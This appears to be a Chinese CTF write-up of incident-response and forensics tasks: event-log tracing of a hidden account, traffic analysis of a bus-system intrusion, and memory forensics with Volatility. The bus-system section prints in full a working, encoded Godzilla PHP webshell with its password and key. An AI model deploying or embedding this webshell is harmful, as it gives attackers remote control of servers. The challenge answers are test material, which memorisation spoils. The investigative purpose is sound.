【任务1】应急大师

题目描述

请提交隐藏用户的名称?

创建用户账户的事件(Event ID: 4720)

4720,直接搜4720
image-20250726154853486

及一个包,solar$

【任务2】应急大师

91人已解答

ikunikeceiLucifrix

题目描述

请提交黑客的IP地址?

分数

55.19 分

这里地址为,他登陆过受害机器,由于网站没有日志,就猜这个地址

【任务3】应急大师

96人已解答

StravvberryGourdboychaiLucifrix

题目描述

请提交黑客的一句话木马密码?

分数

69.14 分

upload下面就是

image-20250726155134517

【任务4】应急大师

89人已解答

StravvberryGourdGuokeHHHXXX

题目描述

请提交黑客创建隐藏用户的TargetSid(目标账户安全ID)?

分数

70.53 分
刚刚创建用户的时候已经知道

image-20250726155245166

【任务5】应急大师

82人已解答

StravvberryGourdHHHXXXLucifrix

题目描述

请提交黑客创建隐藏账户的事件(格式为 年/月/日 时:分:秒)?

分数

72.02 分

image-20250726155321067

【任务6】应急大师

81人已解答

StravvberryGourdGuokeHHHXXX

题目描述

黑客将这个隐藏用户先后加入了哪几个用户组?提交格式为 第一个用户组-第二个用户组,如student-teacher

分数

72.24 分

这里加入用户组的事件id为4732
筛选后2个

image-20250726155513684

image-20250726155533440

Users-Administrators

【任务7】应急大师

69人已解答

StravvberryGourdGuoken0o0b

题目描述

黑客通过远程桌面成功登陆系统管理员账号的网络地址及端口号?提交格式为 IP:PORT 如 127.0.0.1:41110

分数

75.08 分

加入用户组为7.23 17:06,成功登录id为4624
image-20250726155800934

09分登录

【题目信息】公交车系统攻击事件排查

0人已解答

虚位以待虚位以待虚位以待

题目描述

思而听公交系统被黑客攻击,黑客通过web进行了攻击并获取了数据,然后获取了其中一位驾校师傅在FTP服务中的私密文件,其后黑客找到了任意文件上传漏洞进行了GETshell,控制了主机权限并植入了挖矿网页挖矿病毒,接下来你需要逐步排查。
注意:
流量中的21端口对应2121、80端口对应8090。
root的SSH密码为bussec123,第二个地址是SSH地址。
请勿在此提交FLAG,请前往具体任务提交,如【任务1】公交车系统攻击事件排查 提交。

分数

0 分

任务2】公交车系统攻击事件排查

54人已解答

Guokedyzq1234St0rm

题目描述

黑客通过获取的用户名密码,利用密码复用技术,爆破了FTP服务,分析流量以后找到开放的FTP端口,并找到黑客登录成功后获取的私密文件,提交其文件中内容,提交格式:flag{xxx}

分数

179.14 分

image-20250726174446435

端口2121

【任务3】公交车系统攻击事件排查

73人已解答

Guoke楚颖ikecei

题目描述

可恶的黑客找到了任意文件上传点,你需要分析日志和流量以及web开放的程序找到黑客上传的文件,提交木马使用的密码,提交格式:flag{password}

分数

248.19 分

有php的流量image-20250726170136475

直接找即可
image-20250726170207761

是一个godzilla马

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
function encode($D,$K){
	for($i=0;$i<strlen($D);$i++){
		$c = $K[$i+1&15];
		$D[$i] = $D[$i]^$c;
	}
	return $D;
}
 
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
echo gzdecode(encode(base64_decode('fL1tMGI4YTljMUhl+1q6dXsAFwSID4m4QjulvhqntVGokAEvsN0xjfQ3iBq09ARXcZMtSlq0BXFZhV18f+ZhPrEUWJRLotW+dd+QOiIwqAiXL8doW810w2zmJJ92NFQAnMquxw0LhemW4dL0OmkbTABVJokDWAQFfRo7K0t+eaj9XUwTQeRvpBM5uW0oau0dns279iTPcXE4qr/wV2jPXMD/E3KeGFW3srGN9nFo7iC9CtzPhOleu92EvON72AMHa0puQaDO1ysCG11Lg7lD9iKw6AA3yTdnrAQg6f5tbzzVANIG2Y4autANFrhIyFHzwIxwyKZIHL0a6dLS5UF7CmBzM3/yyWay+E6LSMTvmID0/cJXzSdfZ/3M72euck8gfRqqrkxnnYnbyK1XbujcTp3Nuvv1B04mvnuwzElKiubo2XN/3OGGB7ZVe2EHVIoZApjtUoBk2v4k+fWkYZMKrVAahzYcdsUnku09IxU0p3xdjPNzLQw1JF/3dC6AKGikBK6t0+KZpvpdcDYtgA5pDmszGvDg10swCGTrx/GsEddXcliuwjGAKrMmYUNGiu9tLjdrDPy7XDJasDK738UEqxsYLp8/fRCAPdbrDoqPncKY86a3cuKSQhyNT0RVxbZ8zNnYAO8wjI2truoNzdGK9r4Ngj/cdVKJX4r459nbk/QSW37Jy39GCKGWNtZptezfv6vhiHBMZJutn/iqovSuxyaHXEIr2dJwQ/VMO5e4GMV2LGpohsIBLzrpODv+8QDfRFNFejFQXVfDfwGZUcOb8XMxxpvsuc47JXAjVMKAB+nPDzZXb6AmmIQjLY/SLJ+cWlgRTbBoppeE4OR1BSTHIH/N1b1v529/UyhPc7JVlbBS4xSyy7KpnF8gF+XuJeOvoRTpE+XqfU4rtRaPdj2ZqSsFsZH+GYzhZsGD64YuF7yGW36qv47F0LuwpnGe43hhwp/6alkqeHMFaaEWTwq2OL5UyGb47YZb1aFUKoS09jKxTVLU4OBKXxZEl9iZmgUxnrSCeKWwpeFMSMFLHJf4LhOaEgHDkaZSVavjHFit3Pj0zeBudI0HU6A/p6uqIROpsgYeteR7J4xYJRo4VuTrvt1W4ZEVoqcFUFLV0UqwHSEqTOzp7QXuSFrkNhvrU00Vmv842dEpK0ghtdNQo6/tgjMQdxg/QSwuR5nrKH+pgeAKv9ZkRZyHUI4CiHeldiyrrYGEaOgw7xRxUcQIbQYyK7RPzFD3TMlGm65uNIMo0MMlVMm+g/pq/5mtnLsmaDAgTwqPP3m/Xb4aex2A8nej4jnUCQbPbjsGSHNkYhUZIKHmh+RZRYOfCeMwVK7GDvtrS5IEsFsJLbb9FzHxqzjsPkSl3WqQjGizNoYF5CUIhSxwXrZC1W7Kb1Hy+/ZrDOMlpDds2KNxdh+nHJoP+BmImCoZsCTUtk9/V7xVjSK3cSYr/PfcabsgWx8BfRGpN9074adE8XU82seSWwd4GB//xvmIa2K7m7EN7zSE2EDuJNphlGBGMWsNtzZwDyAHgUhYuZjJmX9Ae0sINrMPEl2Rm1ORBhs5U5PnPXPv6X9CSIC1sAIXB/IXed3spGlJRkrKDJ0XSyVakEHjdujc2ltY27SiJL7bGSmVaHzfMO5RM5b3X7CVFTxcNcZYAUS5mioBMYazWtJVoGLjkT/JQuwcVXOx0IApFTWwWKUdb+NgNAnDSbaczxJ8rcUCboU3Tpjj1C6yv/Om+e3nzCHXtTI4Io0SY9rHfzwJEFQAsOfPYQs3gxcssgBRBPr0Btn7QLQe7K/ndlmJMWuIZOjt+WgqqsYdsE0BTX5zFuTYNIqpfUbPpqz0yVmq7TxgnmVuopVmLnsET1fJijo6oF87yTEAXQFSGYWYbkEcdD1I8xjqylMiiSuIFUcPNeCx0a0p6IBylcD4TGhVo54zLU+zU0ttOpwpA/T3KUM0YzE='),$key));
?>

【任务4】公交车系统攻击事件排查

29人已解答

GuokeStravvberryGourddaye8ku

题目描述

分析流量,黑客植入了一个web挖矿木马,这个木马现实情况下会在用户访问后消耗用户的资源进行挖矿(本环境已做无害化处理),提交黑客上传这个文件时的初始名称,提交格式:flag{xxx.xxx}

image-20250726170320932

7102流量有一个文件上传
image-20250726170357394

传的文件名为map.php且有一段混淆js

【任务5】公交车系统攻击事件排查

29人已解答

GuokeStravvberryGourdn0o0b

题目描述

分析流量并上机排查,黑客植入的网页挖矿木马所使用的矿池地址是什么,提交矿池地址(排查完毕后可以尝试删除它)提交格式:flag{xxxxxxx.xxxx.xxx:xxxx}

分数

274.83 分

image-20250726170456282

这一段为矿址,
image-20250726170530937

【题目信息】VOL_EASY

0人已解答

虚位以待虚位以待虚位以待

题目描述

某企业服务器近日遭受隐秘入侵。安全团队通过日志溯源发现,黑客利用Web应用漏洞植入恶意后门,根据溯源的信息配合警方逮捕了黑客,安全团队已经紧急保存了黑客电脑的内存转储文件,请你开始取证以便固定证据。请根据题目文件,找出下面10条证据让罪犯服软吧!

附件下载地址:
通过网盘分享的文件:vol_easy.zip
链接: https://pan.baidu.com/s/1afek1JIX8J0tXoPwTSp84g?pwd=w6iu 提取码: w6iu

解压密码:0f6941beab90bc8be5bc25b6c56ee849

注意:
请勿在此提交FLAG,请前往具体任务提交,如【任务1】VOL_EASY 提交。

分数

0 分

【任务1】VOL_EASY

79人已解答

liebertYouEatMyBugmrl64

题目描述

黑客上传的一句话木马密码是多少?

分数

72.69 分
image-20250726180631762

【任务2】VOL_EASY

87人已解答

mrl64YouEatMyBug2909661377@qq.com

题目描述

黑客使用的木马连接工具叫什么(比如xx.exe)?(仅首字母大写)

分数

70.95 分

蚁剑image-20250726180718439

【任务3】VOL_EASY

82人已解答

YouEatMyBug2909661377@qq.comdaye8ku

题目描述

黑客使用的木马连接工具的位置在哪里(比如C:\xxxx\xx.exe) ?

分数

108.03 分

image-20250726181323160

cmdline 查看

【任务4】VOL_EASY

84人已解答

liebert2909661377@qq.comCloneWith

题目描述

黑客获取到的FLAG是什么?

分数

107.38 分

image-20250726181641642

直接搜即可【任务5】VOL_EASY

69人已解答

2909661377@qq.comdaye8kuaria

题目描述

黑客入侵的网站地址是多少(只需要http://xxxxx/)?

分数

150.16 分
image-20250726181938884

iehistory【任务6】VOL_EASY

80人已解答

2909661377@qq.comx3xdaye8ku

题目描述

黑客入侵时,使用的系统用户名是什么?

分数

72.47 分

上面可以看出 administrator

【任务7】VOL_EASY

41人已解答

daye8kuCloneWithzzpu213

题目描述

黑客创建隐藏账户的密码是多少?

分数

232.73 分